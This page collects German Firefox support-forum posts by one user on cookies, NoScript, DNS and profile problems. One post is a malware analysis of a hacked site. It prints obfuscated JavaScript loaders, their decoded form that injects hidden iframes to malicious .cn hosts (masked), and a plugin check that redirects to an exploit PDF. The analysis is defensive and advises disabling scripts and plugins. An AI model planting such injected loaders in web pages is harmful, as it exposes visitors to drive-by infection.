Die Tuning-Seite ja, aber die Chinesen-Seiten mit der Malware nicht.
Beiträge von boardraider
-
-
Auch dabei gilt: ohne Weiteres nicht.
Der Fx unterschiedet nach Protokollen und (Sub-)Domains (auch Ports). Man müsste daher wieder über eine Erweiterung eingreifen.Alternativ kannst du die Einträge wohl auch in der Text-Datei signons3.txt kopieren und so verfügbar machen, das käme aber einem manuellen Aufruf der Seite in Verbindung mit der Eingabe des Passwortes gleich.
-
Mit einer Rewrite-Engine ist es seitenintern durchaus möglich von den Daten- bzw. Verzeichnisstrukturen zu abstrahieren. Extern kann allerdings nur auf andere Domains weitergeleitet werden. Ansonsten wäre das ja ein Fest für Phisher, wenn man die Domain maskieren könnte.
Ansonsten könnte man natürlich noch eine Art Proxy-Seite nutzen, allerdings müsste man dazu selbst die Inhalte unter der gewünschten Domain verwalten können (ist in dem konkreten Fall leider nicht so). -
Teste es im Safe-Mode oder mit einem neuen Profil.
Hilft das Löschen der cookies.sqlite?
Welche Ausnahmen sind definiert? -
Zitat
Cookies werden während der Session angelegt und haben 365 Tage Gültigkeit (sowie ich's in about:config eingestellt hab) <-- "Login Cookies"
Die anderen Cookie-Typen (php...) haben bis am ende der Sitzung
("Beispiel-Screenshot")In Bezug auf das "Cookie löschen"
Laut deinem zweiten Screenshot hast du bei dir network.cookie.lifetimePolicy auf 0, daher kann die Einstellung für network.cookie.lifetime.days eigentlich nicht wirksam sein. Das wäre nur im Falle von network.cookie.lifetimePolicy = 1.
Da Session-Cookies meist zur Speicherung der Login-Session verwendet und diese beim Schließen gelöscht werden, wundert es nicht, dass du dich dann wieder neu einloggen musst.Ansonsten:
Nenne eine betroffene Seite, bei der die Login-Session nicht in Session-Cookies gespeichert werden, also die Seite die Option anbietet die Session dauerhaft zu speichern.
Hilft das Löschen der cookies.sqlite? -
Zitat
so, habe das (erster Link) in den letzten Wochen mehrfach versucht (Erstellung von alias-Kommandos).
[...]Gehts bei Dir/Euch?Nein, in der Fehlerkonsole tauchen Probleme auf. Wende dich doch an den Autor.
-
Man sollte dann in dem Zusammenhang auch die Ursachen der "Unzulänglichkeiten" betrachten. Da der Fx in den meisten Fällen nicht die Ursache darstellt, dürfte das weniger ein Argument sein. Oder welche Unzulänglichkeiten stören dich im Speziellen?
Man bedenke auch, dass sich die Millionen User ohne Probleme nicht hier im Forum melden... -
Nochmal: der CSS-Fehler auf der Foren-Seite HIER hat nichts mit eBay zu tun.
-
-
Giddijen
Hast du dir ein neues Profil angelegt, wie im Link oben beschrieben? -
Zitat
Wenn man so wirbt, wie Firefox wirbt, dann sollte man das Teil auch Idiotensicher machen.
Für Fehler anderer kann der Fx nichts, in den seltensten Fällen hier kann der Fx als Fehlerquelle ausgemacht werden. Meist sind es Fehlkonfigurationen am Fx, am System oder an Programmen von Drittanbietern.
ZitatIch erwarte, dass man einem hilft wenn Probleme auftauchen und zwar so, dass auch jemand ohne Informatikstudium das versteht. Das ist hier ja nicht der Fall.
Dann bezahl für Support! Wenn du mit der Hilfe hier nicht zu recht kommst, dann ist das die beste Lösung.
ZitatDeswegen wird man sich wohl einen ordentlichen Browser suchen müssen
Mach ruhig, dann bleiben uns zumindest deine unsinnigen Tiraden erspart
ZitatMerkwürdig, ich dachte immer mit Updates sollten Probleme beseitigt werden und nicht neue schwerwiegendere auftauchen.
Komisch, dass es Millionen von Usern ohne Probleme gibt. Aber die melden sich natürlich hier nicht :roll:
ZitatAls jemand, der das Internet für seine Forschungen z.T. benötigt, kann ich Firefox NICHT empfehlen!!!
Brauchst du auch nicht, auf unqualifizierte Äußerungen braucht man eigentlich keinen Wert legen.
-
Zitat
Ich hoffe, dass die Programmierer von Firefox die Beschwerden in diesem Forum auch zu lesen bekommen
Da das Problem nicht beim Fx liegt, dürfte es die Entwickler wenig betreffen. Entweder sind externe Programme (siehe Thread) oder die eBay-Server dafür verantwortlich. Mir ist kein einziger Fall bekannt, in dem ein Fehler reproduzierbar auf den Fx zurückzuführen ist.
Die von dir genannte Meldung hat (wie offensichtlich zu lesen) mit der eBay-Seite nicht das geringste zu tun. Zudem ist es nur ein CSS-Problem.
Ansonsten:
http://www.firefox-browser.de/wiki/Problemdiagnose -
Zitat
Quatsch... raus damit.Router, an den die DNS-Anfragen gerichtet werden? Weshalb dann Quatsch? DNS-Server können im Router gesetzt werden.
-
Und was ist nun, wenn du ein Update auf 08 machst?
-
Zitat
Ergibt (von Kommentaren bereinigt und Variableninhalt verkürzt) zunächst:Codevar yivxy="09020818...1149"; var slxdr=""; for(var hajxnr=3;hajxnr<yivxy.length;hajxnr+=3) slxdr+=String.fromCharCode(yivxy.substring(hajxnr,hajxnr+3)-yivxy.substring(0,3)); setTimeout("eval(slxdr);",100);
Die Variable yivxy enthält eine weitere Kodierung, die über die Schleife aufgelöst wird. Der Inhalt der Variablen slxdr wird im Anschluss dann ausgewertet und ergibt (Link maskiert):Codevar q0=document.createElement('iframe'); q0.src='h**p://bestfindahome.cn/home.html'; q0.style.display='none'; document.body.appendChild(q0);
Eine Einbindung über IFrame, die wieder auf kodierten JS-Code führt. Diesen ausgewertet (verkürzt und bereinigt) ergibt:Codes = ">khtcog\"ute?)jvvr...khtcog@"; for(i=/0; i<s.length;i++) { document.write(String.fromCharCode(s.charCodeAt(i)-2)); }
Der Code schreibt wiederum zwei IFrames in die Seite (Links maskiert):Code<iframe src='h**p://bestfindahome.cn/kitchen.html' width='0' height='0'></iframe><iframe src='h**p://bestfindahome.cn/watchman.html' width='0' height='0'></iframe>
Der erste IFrame enthält dann wieder eine solche Kodierung und führt zu einer IFrame-Einbindung der Seite h**p://http://tixwagoq.cn/in.cgi?4
Dort findet sich dann schließlich die Weiterleitung zu dem mit Schadcode behafteten PDF.Code
Alles anzeigenfunction PDF() { for (var i=0;i<navigator.plugins.length;i++) { var name = navigator.plugins[i].name; if (name.indexOf("Adobe Acrobat") != -1) { location.href = "spl/pdf.pdf"; } } } PDF();ZitatNun, beim betreten deiner Seite bekam ich erstmal einen PDF Download präsentiert.
Es ist nicht empfehlenswert (insbesondere für unbedarfte User) so eine Seite mit Produktivsystemen oder ohne zusätzliche Vorkehrungen zu betreten. Man sollte sich nicht auf AV/FW-Software verlassen, auch 0day-Lücken könnten dort ausgenutzt werden. In einem so gelagerten Fall sollte man vor allem weder mit aktivierten Plugins noch mit aktivem JS die Seite aufrufen.
Ist übrigens hier auch einmal ein Beispiel, dass die Nützlichkeit von NoScript verdeutlicht. -
Zitat
irgendwas werde ich machen
auf eine sicherere Version zu wechseln wäre auch sinnvoll...
-
Zitat
ich hab ein Problem mit dem addon Ubiquity und Noscript
wenn ich was "mappen" will, zeigt er mir nicht die Karte an, sondern nur den Rahmen.
[...]Ich solle doch einfach maps.stcstm.org erlauben.Das ist nicht zutreffend, für das map-Kommando muss google zugelassen sein (man kann es ggf. auf die Subdomains maps und www beschränken).
Zitatbei dem erstem Bild sieht man, dass er mir nicht erlaubt maps.stcstm.org zu erlauben.
bei dem zweitem mal hab ich es einfach mit stcstm.org probiert -> ging auch nicht.
beim drittem mal hab ichs mit irgendeiner Adresse probiert (hab einfach mal ein "m" vorgesetzt) und siehe da: ich kann die Seite zu der Positivliste hinzufügen ...
was ist da los?
hat noscript irgendwas gegen die seite?Das ist kein NoScript-Thread. Daher wäre es besser bzgl. der Problematik einen neuen Thread zu eröffnen. Vorab kann ich aber das angegebene Verhalten mit der aktuellen offiziellen Version nicht bestätigen und nachvollziehen.
-
Zitat
nicht das Zeuch, was dort unten als solches feilgeboten wird
Ich will gar nicht wissen, was für eine Brühe dort oben getrunken wird. Mit Bier hat das geschmacklich wohl nur am Rande zu tun... *eg*
-
Zitat
Habe es mit HTTPFOX gemacht nur ich finde da kein Response im Sinne wo Charsetangaben stehen.
Als Ergänzung ein Screenshot mit HttpFox
[Blockierte Grafik: http://img3.imagebanana.com/img/302l32ms/httpfox.png]
In dem Fall ist eben kein Charset angegeben. -